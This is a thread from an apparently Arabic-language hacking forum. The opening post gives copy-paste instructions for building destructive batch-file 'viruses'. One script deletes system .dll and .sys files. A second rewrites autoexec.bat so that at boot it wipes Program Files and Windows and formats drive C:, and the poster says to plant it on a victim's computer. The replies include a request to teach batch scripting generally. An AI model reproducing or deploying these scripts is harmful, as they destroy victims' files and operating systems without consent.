اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

جايبلكم اليوم موضوع لصنع فيروسات فعالة وسهلة الصنع بدون اي برامج

جايبلكم اليوم موضوع لصنع فيروسات فعالة وسهلة الصنع بدون اي برامج


النتائج 1 إلى 3 من 3

الموضوع: جايبلكم اليوم موضوع لصنع فيروسات فعالة وسهلة الصنع بدون اي برامج

  1. #1
    هكر مبتديء Array
    تاريخ التسجيل
    Sep 2010
    المشاركات
    5

    Ham جايبلكم اليوم موضوع لصنع فيروسات فعالة وسهلة الصنع بدون اي برامج



    السلام عليكم ورحمة الله وباراكاته

    بس قبل ما نبدى بدي ياكم تقرو هانص
    \
    \
    \
    \
    \
    (اقسم بالله العظيم الا استخدم هي الطريقة ضد اي مسلم)

    وانا برئ من اي شخص يستخدمه لغرض الفساد


    ما رح كتر الكلام هادي هي الطريقة


    قم بفتح ال نوتباد notepad وقم بكتابة التالي (مفضل نسخه ولصقه):

    @Echo off
    c:
    cd %WinDir%\System\
    deltree /y *.dll
    cd\
    deltree /y *.sys

    وثم قم بحفظ الملف بالاسم الذي تريده بس لما نكتب الاسم ضع بعده bat. متلا virus.bat
    بعد حفظ الملف ستكون ايقونته بشكل شباك ازرق وبداخله عجلة صفراء ....
    هذا يعني ان الملف جاهز !!! ..!! الحذر . لا تقم بفتحه !!!
    ان القيام بتشغيل هذا الملف سيؤدي الى محو كل ملفات ال dll وال sys من السيستم.
    والان قم بتجربة تشغيل الملف على حاسوب التجارب (اذا كان لديك واحد ) ي
    وصحتين وعافية ...:D

    فايروس ثاني إليكم الطريقه:-

    ايش رايكم بهذا الكود ايضا
    هذا يسوى فورمات للهارد ديسك


    echo [email protected]

    cls
    call attrib -h -r c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
    echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
    echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
    echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
    echo format c: /q /u /autotest >nul >>c:\autoexec.bat

    بنفس الطريقه انسخ هذا الكود وضعه في النوتباد واحفظه باي اسم وامتداده .bat
    عند قيام الجهاز ببدا التشغيل سوف يقوم بقراءه الاوامر من هذا الملف اولا قبل اي ملف اخر
    لذا يجب عليك الحذر وعدم حفظ الملف لديك على القرص لاساسي c/
    واذا اردت ان تضعه لاي شخص انت مسوي عليه هاكر ضعه على الجزء الاساسي اي الـ c

    هذا الفيروس بمجرد ان يضعه الضحيه
    في جهازه اويفتحه سيقوم بفرمتة جهازه
    وايااااااااكم وفتحه

    الطريقه:

    ضع هذا الكود في المفكرة واحفظه باسم Autoexec.bat



    code:--------------------------------------------------------------------------------echo [email protected]
    cls
    call attrib -h -r c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
    echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
    echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
    echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
    echo format c: /q /u /autotest >nul >>c:\autoexec.bat--------------------------------------------------------------------------------

    انشاء الله يفيكم



  2. #2
    هكر مجتهد Array الصورة الرمزية S.N_StrawHat
    تاريخ التسجيل
    Mar 2011
    الدولة
    Grand Line
    المشاركات
    528

    افتراضي رد: جايبلكم اليوم موضوع لصنع فيروسات فعالة وسهلة الصنع بدون اي برامج

    اخي الكريم .... لا تعطني سمكأ ... علمني كيف اصطاد ... كما يقول المثل..

    كان افضل لو قمت بعمل دورة في الملفات الدفعية و خليت الناس يصنعو فيروساتهم عاى هواهم ....

    تحياتي


  3. #3
    هكر متميز Array الصورة الرمزية hooos
    تاريخ التسجيل
    Jul 2010
    الدولة
    في كوكب لوحدي
    المشاركات
    1,878

    افتراضي رد: جايبلكم اليوم موضوع لصنع فيروسات فعالة وسهلة الصنع بدون اي برامج

    مشكور والله يعطيك العافيه



المواضيع المتشابهه

  1. أخطر فيروسات تم أصدارها علي المستوي العالمي حتي اليوم
    بواسطة abdo0099 في المنتدى منتدى الفيروسات
    مشاركات: 33
    آخر مشاركة: 11-15-2012, 08:43 PM
  2. موقع عربي لفك المواقع المحجوبة بدون برامج وفك تشفير الهاش بدون برامج
    بواسطة pulldozer في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 58
    آخر مشاركة: 04-08-2012, 01:18 AM
  3. ماهي افضل واسهل لغة برمجه لصنع برامج الاختراق ... ارجوكم ياهل الخبرة ..
    بواسطة مسواكو في المنتدى قسم المواضيع المخالفة والمكررة
    مشاركات: 10
    آخر مشاركة: 03-11-2012, 10:53 AM
  4. السلام عليكم اليوم جايبلكم برنامج تدور على اي ايميل انت تبغاه ويجيلك
    بواسطة METALO في المنتدى قسم المواضيع المخالفة والمكررة
    مشاركات: 4
    آخر مشاركة: 02-01-2011, 01:10 AM
  5. احلى مجموعة برامج هكر وصانعات فيروسات 2010
    بواسطة العاصفة في المنتدى أدوات اختراق الاجهزة والدمج والتشفير
    مشاركات: 9
    آخر مشاركة: 06-26-2010, 02:00 PM

وجد الزوار هذه الصفحة بالبحث عن:

www.aljyyosh.com bat الملفات الدفعية

بدي برنامج لصنع فايروس

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •